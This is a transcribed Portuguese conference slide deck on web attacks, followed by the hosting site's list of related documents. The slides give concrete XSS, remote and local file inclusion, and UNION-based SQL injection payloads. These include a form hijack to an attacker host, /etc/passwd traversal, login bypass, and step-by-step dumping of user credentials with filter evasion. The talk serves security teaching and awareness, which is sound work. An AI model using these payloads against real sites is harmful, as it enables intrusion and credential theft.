Maycon Maia Vitali ( 0ut0fBound )
|
|
- Natália do Amaral Pacheco
- 7 Há anos
- Visualizações:
Transcrição
1 Maycon Maia Vitali ( 0ut0fBound ) mayconmaia@yahoo.com.br
2 Sobre o palestrante Pra que segurança? Ataques de Cross-Site-Script (XSS) Ataques de File Include Ataques de SQL Injection Mecanismos de proteção (funcionam?) Ataques planejados (avançado) Técnicas de evasão Exemplos reais
3 Maycon Maia Vitali Graduando em Ciência da Computação no Centro Universitário Vila Velha Não possui certificação Microsoft Não possui certificação Linux Não possui certificação Java Não possui certificação em Bando de Dados Não possui certificação em Redes Não possui certificação em Segurança da Informação
4 Autodidata em segurança da informação; Analista Pen-test (free-lancer) para diversas empresas/tigers Team; Escritor de artigos técnicos envolvendo segurança da informação; Palestrantes em diversos eventos tecnológico como H2HC, Encasoft, Code Breakers Meeting, etc; Desenvolvedor de ferramentas de auditoria de segurança; Também conhecido como 0ut0fBound.
5 Escrita de exploits Escrita e otimização de shellcodes Ataques web Técnicas de evasão Engenharia Reversa (análise de malwares) Sistemas de Detecção de Intrusão Qualquer coisa que tenha Baixaria
6 Por prazer (hobby) Necessidade pessoal ou corporativa Para estar um passo a frente (contra 0-day) Hack n Roll Maldita inclusão digital Se uma coisa pode dar errada de 4 maneiras possíveis e você consegue driblar as 4, quer dizer que na verdade eram 5 - Murphy
7 Citação 1 Toda entrada é mal intencionada até que se provém ao contrário Citação 2 O sistema esta seguro até que se provem ao contrário
8 Permite ao atacante executar código Client-Side (JavaScript?) no browser da vítima Impacto irrelevante em ataques não planejados Trabalho em conjunto com Engenharia Social (Porque não existe patch pra estupidez humana) Com sucesso absoluto, permite fazer Session Hijacking
9 Variável busca não passar por nenhum tipo de filtro ou tratamento antes de retornar ao navegador do usuário Para sucesso o ataque deve ser planejado e com Engenharia Social
10 script>document.frmlogin.action= w.hacker.com/fake_login.php </script> Session Hijacking XMLHttpRequest (Ajax?) é seu amigo!!
11 Solução de detecção/prevenção de intrusão Snort ( qualquer dúvida fale com Sp0oker ) Investir em desenvolvimento seguro
12 Também conhecida por PHP Injection Consiste em alterar o valor de variáveis que são passadas como parâmetros para a função include(_once) ou require(_once) Impacto significante no servidor; Por causa de uma falha todo o servidor pode ser comprometido;
13
14 Efetua Ataque GET b4d_c0de.txt Hack n Roll Código Maléfico Servidor da Empresa Servidor do Atacante
15 /index.php?pagina= de.txt? &cmd=id
16 Filtrar assinaturas de ataques.
17 Filtrar assinaturas de ataques. pagina=
18 Filtrar assinaturas de ataques.
19 Filtrar assinaturas de ataques. pagina= pagina=ftp://ftp.hack.com/b4d_c0de.txt%00
20 Filtrar assinaturas de ataques.
21 Filtrar assinaturas de ataques. pagina=\\samba_hacker\b4d_c0de.txt%00
22 HTTP and HTTPS FTP and FTPS PHP input/output streams Compression Streams Data (RFC 2397) Glob Secure Shell 2 Audio Streams Process Interaction Streams
23 figuration.php#ini.allow-url-fopen allow_url_fopen=off
24 figuration.php#ini.allow-url-fopen allow_url_fopen=off pagina=../../../../../etc/passwd%00
25 Existem outras soluções boas e seguras.
26
27 Ocorre quando é possível inserir (injetar) códigos SQL em uma aplicação a partir de informações fornecidas pelo usuário Permite ler dados sensíveis do Banco de Dados Permite modificar dados do Banco de Dados (insert/delete/update) Permite executar comandos administrativos do Banco de Dados (ex: shutdown) Em alguns casos, permite executar comandos no Sistema Operacional.
28 Como o valor digitado não passou por nenhum tipo de filtro um atacante pode injetar códigos SQL alterando a lógica da consulta.
29 Usuário: or = Senha: or =
30
31 Usuário: UNION SELECT hacker, h4ck3r Senha: h4ck3r Senha Usuário A primeira consulta não retorna nenhum registro enquanto a segunda retorna um registro criado na mão.
32 Função addslashes() Configuração magic_quotes (DEPRECATED and REMOVED as of PHP 6.0.0) Será o FIM dos ataques de SQL Injection?
33 Toda entrada é mal intencionada Planejamento para um ataque complexo Blind SQL Injection Dump do Banco de Dados Saber programação e conhecimento do protocolo HTTP ajuda muito!! Utilização de ferramentas auxiliares ( nada de clique e invada ) Você não foi o programador (designer?), logo não sabe como está estruturado
34 Fazer a enumeração dos possíveis links e suas variáveis Em casos de perfumarias (ajax?) ferramentas como FireBug e WebDeveloper podem auxiliar
35 Levantar se alguns dos campos possui uma vulnerabilidade de SQL Injection: Não retornar um aviso de campo inválido ou tentativa de invasão(?) sugere a possibilidade de uma falha.
36 /noticias.php?id=2871 order by /noticias.php?id=2871 order by /noticias.php?id=2871 order by /noticias.php?id=2871 order by /noticias.php?id=2871 order by /noticias.php?id=2871 order by /noticias.php?id=2871 order by Errado Errado Certo Errado Errado Certo Errado Total de colunas na consulta original: 13
37 /noticias.php?id=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- ENCASOFT 2008 Leomar V. A Linux-ES, comunidade de usuários de Software Livre do Espírito Santo, tem o prazer de anunciar a quarta edição do Encontro Capixaba de Software Livre ENCASOFT O evento será realizado nos dias 10 e 11 de outubro (sexta e sábado), no Centro Universitário Vila-Velha (UVV), Vila-Velha-ES
38 Já temos um vetor de ataque. Já sabemos quantas colunas a consulta possui. Já sabemos quais colunas são visíveis. O que falta? Nomes de tabelas e nomes de campos Como conseguir? Brute-Force (usuarios, tb_usuarios, logins, acesso, etc) INFORMATION_SCHEMA é seu melhor amigo.
39
40
41
42 /noticias.php?id=0 union select 1, 2, TABLE_NAME, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 FROM INFORMATION_SCHEMA.TABLES -- /noticias.php?id=0 union select 1, 2, TABLE_NAME, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ( tab_noticia ) -- tab_noticia 6 7 tab_newsletter 6 7
43 /noticias.php?id=0 union select 1, 2, TABLE_NAME, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (CHAR(116, 98, 95, 110, 111, 116, 105, 99, 105, 97)) -- Char ASCii t 116 b 98 _ 95 n 110 o 111 t 116 i 105 c 99 i 105 a 97 tab_newsletter 6 7
44 /noticias.php?id=0 union select 1, 2, TABLE_NAME, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE %usu% -- tab_usuario 6 7
45 /noticias.php?id=0 union select 1, 2, COLUMN_NAME, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 from INFORMATION_SCHEMA.COLUNMS where TABLE_NAME = tb_usuario -- /noticias.php?id=0 union select 1, 2, COLUMN_NAME, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 from INFORMATION_SCHEMA.COLUNMS where TABLE_NAME = tb_usuario and COLUMN_NAME not in ( usu_id ) -- usu_id 6 7 usu_login 6 7
46 /noticias.php?id=0 union select 1, 2, TABLE_NAME, 4, 5, 6, COLUMN_NAME, 8, 9, 10, 11, 12, 13 from INFORMATION_SCHEMA.COLUNMS where COLUMN_NAME like %senha% -- tb_usuario 6 usu_senha
47 Tendo o nome da tabela e seus respectivos campos de login/senha: /noticias.php?id=0 union select 1, 2, usu_login, 4, 5, 6, usu_senha, 8, 9, 10, 11, 12, 13 from tb_usuarios -- admin
48 Duas linhas de código em troca de muuuuita muuuita dor de cabeça, perda de dinheiro e de clientes.
49 Verificar por triggers ou store procedures que facilitem o trabalho; Verifiquem que nível de permissão possui (xp.dbo.cmd_shell é seu amigo); Procure por outros vetores de ataques, visto que falhas com listagem de resposta viabiliza mais o sucesso e em menos tempo; No caso de brute-force tente procurar por padrões;
50 Maycon Maia Vitali ( 0ut0fBound ) mayconmaia@yahoo.com.br
Lidando com Armazenamento de Dados
Lidando com Armazenamento de Dados Paulo Ricardo Lisboa de Almeida 1 Armazenamento de Dados A grande maioria das aplicações possuem algum mecanismo para armazenagem de dados Dados de usuários Permissões
Leia maisAula 6: Vulnerabilidades Web
Aula 6: Vulnerabilidades Web Exploits of a Mom http://xkcd.com 1.1 Objectivos: Compreender duas vulnerabilidades encontradas em aplicações web: SQL Injection; Cross-site Scripting. Pensar sobre formas
Leia mais474QU35 J1y4n y4r
J1y4n y4r1 0000 0001 71P05 D3 0000 0011 FOOTPRINTING TAREFA DE COLETAR INFORMAÇÕES SOBRE UM SISTEMA ALVO; - FEITA POR VIAS TRADICIONAIS E PÚBLICAS, COMO USO DO FINGER, LEITURA DE PÁGINAS DO SITE PARA OBTER
Leia maisSegurança em Sistemas Web. Addson A. Costa
Segurança em Sistemas Web Addson A. Costa Spoofing de formulários Spoofing consiste em falsificação, por exemplo, na área de redes um computador pode roubar o IP de outro e assim fazer-se passar por ele.
Leia maisPetter Anderson Lopes Arbitragem, Desenvolvimento Seguro, Segurança Ofensiva e Forense Computacional
Requerente: Metadados Assessoria e Sistemas. Empresa: Metadados Assessoria e Sistemas Especialista: Petter Anderson Lopes. Período: fevereiro de 2019. Modelo: Pentest, OWASP Top 10 2013 compliance. OWASP
Leia maisAula 4. Ivan Sendin. 30 de agosto de FACOM - Universidade Federal de Uberlândia SEG-4.
Segurança da Informação Aula 4 FACOM - Universidade Federal de Uberlândia ivansendin@yahoo.com,sendin@ufu.br 30 de agosto de 2017 Google Hacking Utilizar uma search engine para buscar falhas específicas
Leia maisEstratégias de Segurança para Desenvolvimento de Software. Italo Valcy e Kaio Rodrigo CoSIC / STI-UFBA
Estratégias de Segurança para Desenvolvimento de Software Italo Valcy e Kaio Rodrigo CoSIC / STI-UFBA Aplicações como alvo nos ataques https://blogs.technet.microsoft.com/seguridad/2014/09/24/site-de-um-dos-maiores-jornais-do-brasil-foicomprometido-com-malware-que-tentou-alterar-as-configuraes-de-dns-nos-roteadores-das-vtimas/
Leia maisSEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA
SEGURANÇA EM APLICAÇÕES WEB PROF.: PAULO RICARDO LISBOA DE ALMEIDA APLICAÇÕES DESKTOP VERSUS WEB Quais são as diferenças do ponto de vista da segurança APLICAÇÕES DESKTOP VERSUS WEB Em uma aplicação desktop,
Leia maisO papel do IT Service Desk como 1ª linha de defesa contra Ciberataques. Cristiano Breder
O papel do IT Service Desk como 1ª linha de defesa contra Ciberataques. Cristiano Breder cbreder@post.com Estágio do mercado Receita do mercado Tamanho do mercado até 2020 Taxa de crescimento anual Concentração
Leia maisProf. Roberto Franciscatto 4º Semestre - TSI - CAFW. Free Powerpoint Templates Page 1
Segurança na Web Capítulo 9: Segurança em Aplicações Web Prof. Roberto Franciscatto 4º Semestre - TSI - CAFW Page 1 Introdução Quando se fala em segurança na WEB é preciso pensar inicialmente em duas frentes:
Leia maisTaxonomia Comum para a Rede Nacional de CSIRTs
Taxonomia Comum para a Rede Nacional de CSIRTs Taxonomia Comum para a Rede Nacional de CSIRTs Dezembro de 2012 ÍNDICE 1 INTRODUÇÃO... 2 2 CLASSIFICAÇÃO DE INCIDENTES... 3 i 1 INTRODUÇÃO Este documento
Leia maisPLANO DE ENSINO 2016/1
Nome do Curso: SISTEMAS DE INFORMAÇÃO Nome da Disciplina: PRÁTICA DE PROGRAMAÇÃO Período: 3 Nome Professor (a): Guiliano Rangel Alves Curso de vinculação do professor (a): Sistemas de Informação Código:
Leia maisIDENTIFICANDO VULNERABILIDADES EM LARGA ESCALA ATRAVÉS DE FALHAS DE DESENVOLVIMENTO
IDENTIFICANDO VULNERABILIDADES EM LARGA ESCALA ATRAVÉS DE FALHAS DE DESENVOLVIMENTO Quem sou eu: Desenvolvedor PHP? -Sim Entusiasta da área de segurança? -Sim Então trabalha com segurança? -Não, se trabalhar
Leia maisCross-Site Scripting (XSS): Entendendo o conceito e seus tipos
Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos Talvez a vulnerabilidade de segurança de aplicações web mais comum e mais debatido é Cross-Site Scripting (XSS). Quando tais vulnerabilidades
Leia maisCross-Site Scripting. Paulo Ricardo Lisboa de Almeida. 1 Universidade Positivo
Cross-Site Scripting Paulo Ricardo Lisboa de Almeida 1 Cross-Site Scripting - XSS Foco no ataque aos usuários finais O servidor não é diretamente afetado Dificuldade na detecção dos ataques Podem comprometer
Leia maisGERAÇÃO DE ARQUIVOS DE SCRIPT EM PHP. Acadêmico: Leonardo Sommariva Orientador: Alexander Roberto Valdameri
FERRAMENTA VISUAL PARA GERAÇÃO DE ARQUIVOS DE SCRIPT EM PHP Acadêmico: Leonardo Sommariva Orientador: Alexander Roberto Valdameri ROTEIRO Introdução Objetivos Motivação Fundamentação Teórica Desenvolvimento
Leia maisEspecializado Web Programmer
Especializado Web Programmer Formato do curso: Presencial Localidade: Lisboa Data: 19 Fev. 2018 a 27 Jun. 2018 Preço: 1895 Horário: Pós-laboral - 2ª, 4ª e 6ª, das 18h30 às 21h30 Nível: Iniciado Duração:
Leia maisSYHUNT HYBRID: GUIA DE INTRODUÇÃO
SYHUNT HYBRID: GUIA DE INTRODUÇÃO As informações contidas neste documento se aplicam a versão 6.5 do Syhunt Hybrid. INTRODUÇÃO O Syhunt Hybrid é uma suíte híbrida de avaliação de segurança de aplicações
Leia maisAtaque em Sistemas Distribuídos Site :
Faculdade de Engenharia da Computação Disciplina: Segurança Aplicada à Computação Ataque em Sistemas Distribuídos Site : http://www1.univap.br/~wagner/ec.html / / h Prof. Responsáveis Wagner Santos C.
Leia maisQuando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes:
Segurança Informa tica e nas Organizaço es Vulnerabilidades na Web (V1.1) Este trabalho deve ser realizado na máquina virtual Ubuntu10tm que pode descarregar de ftp://www.ieeta.pt/avzdatastore/vulnerable%20linux/ubuntu10tm.zip,
Leia maisTeste de Software para. Segurança de Sistemas. COTI Informática Escola de Nerds
Teste de Software para COTI Informática Escola de Nerds Segurança de Sistemas A COTI Informática A COTI Informática é uma instituição de ensino nas áreas de Programação, Banco de Dados, Análise de Sistema
Leia maisOPORTUNIDADES: Analista de Sistemas Sênior
OPORTUNIDADES: Analista de Sistemas Sênior Experiência em projetos de desenvolvimento de sistemas Conhecimento de metodologia de desenvolvimento de sistema Experiência em levantamento de requisitos e elaboração
Leia maisCampus Capivari Técnico em Manutenção e Suporte em Informática Prof. André Luís Belini /
Campus Capivari Técnico em Manutenção e Suporte em Informática Prof. André Luís Belini E-mail: prof.andre.luis.belini@gmail.com / andre.belini@ifsp.edu.br MATÉRIA: SEGURANÇA DE REDES Aula N : 02 Tema:
Leia maisWelington R. Monteiro Fatea Segurança 09/2016
Welington R. Monteiro Fatea Segurança 09/2016 É uma vulnerabilidade encontrada em aplicações web, que permite a injeção de códigos no lado do cliente, ou seja, altera a página apenas no computador do usuário.
Leia maisUniversidade Federal de Uberlândia Faculdade de Computação Projeto de Programação para Internet Prof. Dr. Daniel A Furtado
Universidade Federal de Uberlândia Faculdade de Computação Projeto de Programação para Internet Prof. Dr. Daniel A Furtado Descrição Geral Desenvolver um website para uma loja virtual que atenda às especificações
Leia maisDesenvolvendo aplicações Apex mais seguras Anderson Rodrigues Ferreira
Desenvovendo apicações Apex mais seguras Anderson Rodrigues Ferreira D&5&nv0v&nd0 @p1c@ç0&5 @p&x m@15 5&6ur@5 @nd&r50n R0dr1gu&5 F&rr&1r@ Desenvovendo apicações Apex mais seguras Anderson Rodrigues Ferreira
Leia maisHardening de equipamentos
Hardening de equipamentos Atividades nos Honeypots Distribuídos Força bruta de senhas (usado por malwares de IoT e para invasão de servidores e roteadores): Telnet (23/TCP) SSH (22/TCP) Outras TCP (2323,
Leia maisInternet Explorer 8.0 Navegador (Browser)
Internet Explorer 8.0 Navegador (Browser) O Internet Explorer 8 foi projetado para facilitar a navegação e a interação com sites na Internet ou na intranet. Sempre que você usa a Internet, ou um software
Leia maisINTRODUÇÃO A PROGRAMAÇÃO AVANÇADA PARA WEB E AO HTML. Prof. Msc. Hélio Esperidião
INTRODUÇÃO A PROGRAMAÇÃO AVANÇADA PARA WEB E AO HTML Prof. Msc. Hélio Esperidião NAVEGADOR O navegador também conhecido como web browseré um programa que habilita seus usuários a interagirem com documentos
Leia maisEspecializado Web Programmer. Sobre o curso. Destinatários. Pré-requisitos. Tecnologias de Informação - Web e Mobile. Promoção: 15% Desconto
Especializado Web Programmer Tecnologias de Informação - Web e Mobile Promoção: 15% Desconto Localidade: Porto Data: 31 Oct 2016 Preço: 1805 ( Os valores apresentados não incluem IVA. Oferta de IVA a particulares
Leia maisDaniel Moreno. Novatec
Daniel Moreno Novatec Novatec Editora Ltda. 2017. Todos os direitos reservados e protegidos pela Lei 9.610 de 19/02/1998. É proibida a reprodução desta obra, mesmo parcial, por qualquer processo, sem prévia
Leia maisApostila 4. Ameaças e Contramedidas de Segurança no Host
Apostila 4 Ameaças e Contramedidas de Segurança no Host 1 Ameaças e Contramedidas de Segurança no Host As ameaças no host são direcionadas ao sistema de software sobre o qual suas aplicações são construídas.
Leia maisIntrodução 20 Diagramas de fluxos de dados 20 O processo de elaboração de DFD 22 Regras práticas para a elaboração de DFD 24 Dicionário de dados 26
ÍNDICE MÓDULO 1 ANÁLISE DE SISTEMAS 9 1.1 SISTEMAS DE INFORMAÇÃO 10 Sistema conceito e exemplos 10 Dados e informação 11 Sistema de informação conceito e componentes 12 Sistema de informação e sistemas
Leia maisSegurança de aplicações web: Experimentos e taxonomia de ataques.
Segurança de aplicações web: Experimentos e taxonomia de ataques. Resumo Cícero Roberto Ferreira de Almeida A segurança nas interações eletrônicas via web é um tema relevante para usuários e organizações
Leia maisSEGURANÇA DE SISTEMAS E REDES. TÁSSIO JOSÉ GONÇALVES GOMES
SEGURANÇA DE SISTEMAS E REDES TÁSSIO JOSÉ GONÇALVES GOMES www.tassiogoncalves.com.br tassiogoncalvesg@gmail.com CONTEÚDO Visão geral sobre o Pentest Tipos de Pentest As fases de um ataque Categorias de
Leia maisSegurança Informática e nas Organizações. Guiões das Aulas Práticas
Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão
Leia maisSQL/HTML Injection e Criptografia Professor Fábio Luís da Silva Santos
SQL/HTML Injection e Criptografia Professor Fábio Luís da Silva Santos SQL Injection Muitos desenvolvedores web não sabem de como consultas SQL podem ser manipuladas e presumem que uma consulta de SQL
Leia maisINTRODUÇÃO A PROGRAMAÇÃO PARA WEB
INTRODUÇÃO A PROGRAMAÇÃO PARA WEB PROF. ME. HÉLIO ESPERIDIÃO Navegador O navegador também conhecido como web browser é um programa que habilita seus usuários a interagirem com documentos hospedados em
Leia maisQual a proposta? Hardening de infraestrutrua de hospedagem Firewall de aplicação Pentest de aplicações web Análise estática de código
Segurança de aplicações web como aumentar a segurança dos sites da sua organização Italo Valcy, Pedro Sampaio, Michel Peterson, Bruno Diego ETIR UFBA Qual o cenário? Incidentes de Segurança de Desfiguração
Leia maisBanco de Dados SQL injection
Universidade Estadual de Mato Grosso do Sul Curso de Computação, Licenciatura Banco de Dados SQL injection '1 = 1 Prof. José Gonçalves Dias Neto profneto_ti@hotmail.com SQL Injection - Introdução Injeção
Leia maisEmenta Oficial do. Curso Pentest: Técnicas de Invasão Básico
Ementa Oficial do Curso Pentest: Técnicas de Invasão Básico Capítulo 01 Introdução Introdução ao Curso Termos Comuns Teste de Invasão (pentesting) Red Team (Equipe Vermelha) Hacking Ético White Hat Black
Leia maisConstruindo Aplicações Web Habilitadas à Segurança
Construindo Aplicações Web Habilitadas à Segurança PERES, Paulo Júnior de Jesus [1] PINTO, Aurílio Guimarães [2] FREITAS, Caio Guimarães [3] LEITE, Francisco Canindé da Silva [4] SILVA, Francisco Eronildo
Leia maisManual Básico de Configuração para Acesso Remoto ao Portal de Periódicos CAPES Versão 1.0
Manual Básico de Configuração para Acesso Remoto ao Portal de Periódicos CAPES Versão 1.0 NTI Núcleo Técnico de Informações Março/2012 Manual Básico de Configuração para Acesso Remoto ao Portal de Periódicos
Leia maisIncorporar Segurança Digital nas organizações é uma questão fundamental. Italo Valcy 01/Out/2018, IX WTR do PoP-BA
Incorporar Segurança Digital nas organizações é uma questão fundamental Italo Valcy 01/Out/2018, IX WTR do PoP-BA Muitas notícias de ataques, fraudes, problemas de segurança digital...
Leia maisAULA 8. Ambientes Visuais 8.1. OBJETIVO DA AULA SQL (Structured Query Language)
AULA 8 8.1. OBJETIVO DA AULA Relembrar conceitos e recursos básicos apresentados nas aulas anteriores, dar continuidade nas codificações iniciadas e ainda não finalizadas, explorar acesso a banco de dados
Leia maisXSS - CROSS-SITE SCRIPTING
Segurança XSS - CROSS-SITE SCRIPTING XSS - CROSS-SITE SCRIPTING Vamos supor a seguinte situação: O site ingenuo.com tem um fórum As pessoas escrevem comentários nesse fórum e eles são salvos diretamente
Leia maisFundamentos de Ethical Hacking EXIN. Guia de Preparação. Edição
Fundamentos de Ethical Hacking EXIN Guia de Preparação Edição 201701 Copyright EXIN Holding B.V. 2017. All rights reserved. EXIN is a registered trademark. No part of this publication may be reproduced,
Leia maissegurança em aplicações web
segurança em aplicações web myke hamada mykesh gmail 1 whoami ciência da computação segurança da informação ruby rails c# vbscript opensource microsoft ethical hacking 2 agenda introdução ontem e
Leia maisTECNOLOGIA DA INFORMAÇÃO
PÓS EM COMÉRCIO EXTERIOR E ESTRATÉGIA UNIVERSIDADE CATÓLICA DE PETRÓPOLIS CENTRO DE CIÊNCIAS SOCIAIS APLICADAS TECNOLOGIA DA INFORMAÇÃO.:UNIDADE 5 - SEGURANÇA DA INFORMAÇÃO:. PARTE 2 - AMEAÇAS A SEGURANÇA
Leia maisA CASA DO SIMULADO DESAFIO QUESTÕES MINISSIMULADO 122/360
1 DEMAIS SIMULADOS NO LINK ABAIXO CLIQUE AQUI REDE SOCIAL SIMULADO 122/360 INFORMÁTICA INSTRUÇÕES TEMPO: 30 MINUTOS MODALIDADE: CERTO OU ERRADO 30 QUESTÕES CURTA NOSSA PÁGINA MATERIAL LIVRE Este material
Leia maisA Resposta a Incidentes no Processo de Desenvolvimento Seguro. Daniel Araújo Melo -
A Resposta a Incidentes no Processo de Desenvolvimento Seguro Daniel Araújo Melo - daniel.melo@serpro.gov.br 1o. Fórum Brasil-Amazônia de TIC - 11/11/2011 Agenda Segurança em TIC Resposta a Incidentes
Leia mais20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP
20º Fórum de Certificação para Produtos de Telecomunicações 30 de novembro de 2016 Campinas, SP Problemas de Segurança e Incidentes com CPEs e Outros Dispositivos Cristine Hoepers cristine@cert.br Incidentes
Leia mais4 o Fórum Brasileiro de CSIRTs 17 e 18 de setembro de 2015 São Paulo, SP
4 o Fórum Brasileiro de CSIRTs 17 e 18 de setembro de 2015 São Paulo, SP Uso de Flows no Tratamento de Incidentes - Estudo de Caso do CSIRT Unicamp Daniela Barbetti daniela@unicamp.br Agenda: CSIRT Unicamp
Leia maisPOLÍTICAS DE USO SPAM Agressão à Performance OBS:. O tópico de Agressão à Performance só se aplica a hospedagem de site compartilhada e revenda.
POLÍTICAS DE USO SPAM Por definição, Spam (Unsolicited Commercial E-mail) é basicamente o envio de mensagens eletrônicas geralmente em grande quantidade e para múltiplos destinatários, forçando-os a ler
Leia maisSegurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com
UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel
Leia maisSQL INJECTION: ENTENDENDO E EVITANDO. MAGALHÃES, Felipe. B. ¹, BASTOS, Rafael. R² RESUMO
SQL INJECTION: ENTENDENDO E EVITANDO MAGALHÃES, Felipe. B. ¹, BASTOS, Rafael. R² ¹ Faculdade IDEAU Bagé RS Brasil magalhaesbg@gmail.com ² Faculdade IDEAU Bagé RS Brasil rafaelrodriguesbastos@gmail.com
Leia maisNesta disciplina aprenderemos. HTML CSS JavaScript Jquery PHP
Introdução Nesta disciplina aprenderemos HTML CSS JavaScript Jquery PHP HTML é a abreviatura de HyperText Mark-up Language. O HTML foi inventado em 1990, por um cientista chamado Tim Berners-Lee. A finalidade
Leia maisSegurança em PHP. Exemplos e Casos Práticos
Segurança em PHP Exemplos e Casos Práticos Nuno Lopes, NEIIST 3º Ciclo de Apresentações. 17/Março/2005 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Cross-Site Request Forgeries (CSRF) SQL
Leia maisDesenvolvimento Web II
Desenvolvimento Web II Framework Laravel 5 Controller / Model / Migration / Seeder (Menu Principal SETA) Gil Eduardo de Andrade Configuração Banco de Dados No framework Laravel as informações de configuração
Leia maisGuia de dupla autenticação
Guia de dupla autenticação Indice Guia de Dupla Autenticação 1. Introdução à Dupla Autenticação: O que é? 4 Ataques às senhas 6 Força Bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2. Como configurar
Leia maisINTERNET E SEGURANÇA DOS DADOS. Introdução a Computação e Engenharia de Software. Profa. Cynthia Pinheiro
INTERNET E SEGURANÇA DOS DADOS Introdução a Computação e Engenharia de Software Profa. Cynthia Pinheiro Internet Quem controla a Internet? A principal razão pela qual a Internet funciona tão bem, deve-se
Leia maisFaculdade de Engenharia da Computação
Faculdade de Engenharia da Computação Disciplina: Segurança Aplicada à Computação Ataque em Sistemas Distribuídos Site : http://www1.univap.br/~wagner/ec.html Prof. Responsáveis Wagner Santos C. de Jesus
Leia maisAVISO Nº 02 - RETIFICAÇÃO. A Companhia de Processamento de Dados do Estado do Rio Grande do Sul PROCERGS, torna público, por este Aviso, o que segue:
1 GOVERNO DO ESTADO DO RIO GRANDE DO SUL COMPANHIA DE PROCESSAMENTO DE DADOS DO ESTADO DO RIO GRANDE DO SUL - PROCERGS CONCURSOS PÚBLICOS EDITAL DE ABERTURA Nº 01/2018 AVISO Nº 02 - RETIFICAÇÃO A Companhia
Leia maisPetter Anderson Lopes Arbitragem, Desenvolvimento Seguro, Segurança Ofensiva e Forense Computacional
Requerente: Metadados Assessoria e Sistemas. Empresa: Metadados Assessoria e Sistemas Especialista: Petter Anderson Lopes. Período: fevereiro de 2019. Modelo: Pentest, ISO27001:2013 compliance. Norma Internacional
Leia maisSegurança Informática e nas Organizações. Guiões das Aulas Práticas
Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão
Leia maisSOLICITAÇÃO DE CERTIFICADO SERVIDOR TOMCAT
SOLICITAÇÃO DE CERTIFICADO SERVIDOR TOMCAT Para confecção desse manual, foi usado o Sistema Operacional Windows XP Professional com SP2 e JDK 1.6.0_04. Algumas divergências podem ser observadas caso a
Leia maisAnalista de Negócios. Local de Trabalho: Porto Alegre. Número de Vagas: 02. Analista de Sistemas
Analista de Negócios - Especificação de Requisitos, - Modelagem de Sistemas e Processos, - 2 anos de experiência na função, - Bom relacionamento interpessoal, criatividade, pró-atividade e facilidade de
Leia maisAula Prática de Redes Industriais Wireshark
Aula Prática de Redes Industriais Wireshark O entendimento de protocolos de redes pode ser bastante aprofundado através da observação de protocolos funcionando e da manipulação de protocolos - observando
Leia maisSOLO NETWORK. Guia de dupla autenticação
(11) 4062-6971 (21) 4062-6971 (31) 4062-6971 (41) 4062-6971 (48) 4062-6971 (51) 4062-6971 (61) 4062-6971 SO LO N ET W O RK Guia de dupla autenticação (11) 4062-6971 (21) 4062-6971 (31) 4062-6971 (41) 4062-6971
Leia maisAula 3. Ivan Sendin. 22 de agosto de FACOM - Universidade Federal de Uberlândia SEG. Ivan Sendin.
Segurança Aula 3 FACOM - Universidade Federal de Uberlândia ivansendin@yahoo.com,sendin@ufu.br 22 de agosto de 2018 Informação =$$ Confidencialidade, Integridade e Disponibilidade (qual é mais importante?)
Leia maisConheça nossa solução Corporativa de Backup e Armazenamento
Conheça nossa solução Corporativa de Backup e Armazenamento QUEM SOMOS Compromisso com o Cliente Somos uma empresa com foco em tecnologia da informação. Nossa missão é deixá-lo tranquilo para cuidar do
Leia maisManipulação de arquivos em PHP
Manipulação de arquivos em PHP Introdução De vez em quando é necessário ler, alterar ou criar arquivos no servidor de Internet, como por exemplo, para criar contadores de acesso, estatísticas de visitas
Leia maisRedes de Computadores
Redes de Computadores FTP Prof. Thiago Dutra Agenda n Definição de FTP n Características do FTP n Usos Comuns do FTP n Funcionamento do FTP n Mensagens FTP n Códigos de Resposta
Leia maisBanco de talentos. Os interessados devem enviar currículo, com o código «programador / analista pleno» para
VAGA DISPONÍVEL: Programador / Analista Pleno PERFIL DA VAGA Profissional altamente capacitado nas ferramentas usadas no mercado, geralmente com curso superior e alguma certificação ou conhecimento equivalente,
Leia maisSegurança e IoT: desafios e expectativas, com base nos incidentes que já estão ocorrendo. Cristine Hoepers, D.Sc. Gerente Geral CERT.br/NIC.
Segurança e IoT: desafios e expectativas, com base nos incidentes que já estão ocorrendo Cristine Hoepers, D.Sc. Gerente Geral CERT.br/NIC.br A Internet das Coisas... is the network of physical objects
Leia mais3/9/2011. Segurança da Informação. Segurança da Informação. O que é Segurança e seguro? Prof. Luiz A. Nascimento Auditoria e Segurança de Sistemas
Segurança da Informação Prof. Luiz A. Nascimento Auditoria e Segurança de Sistemas Segurança da Informação Milhões de empresas e profissionais estão usando a Internet para fazer transações bancárias, comercio
Leia maisEntendendo o Sequestro de Sessão (Session Hijacking)
Entendendo o Sequestro de Sessão (Session Hijacking) O seqüestro de sessão é sinônimo de uma sessão roubada, na qual um invasor intercepta e assume uma sessão legitimamente estabelecida entre um usuário
Leia maisConfiguração do Intrusion Prevention System (IPS) para o roteador da Segurança do gigabit do Sem fio-n WRVS4400N
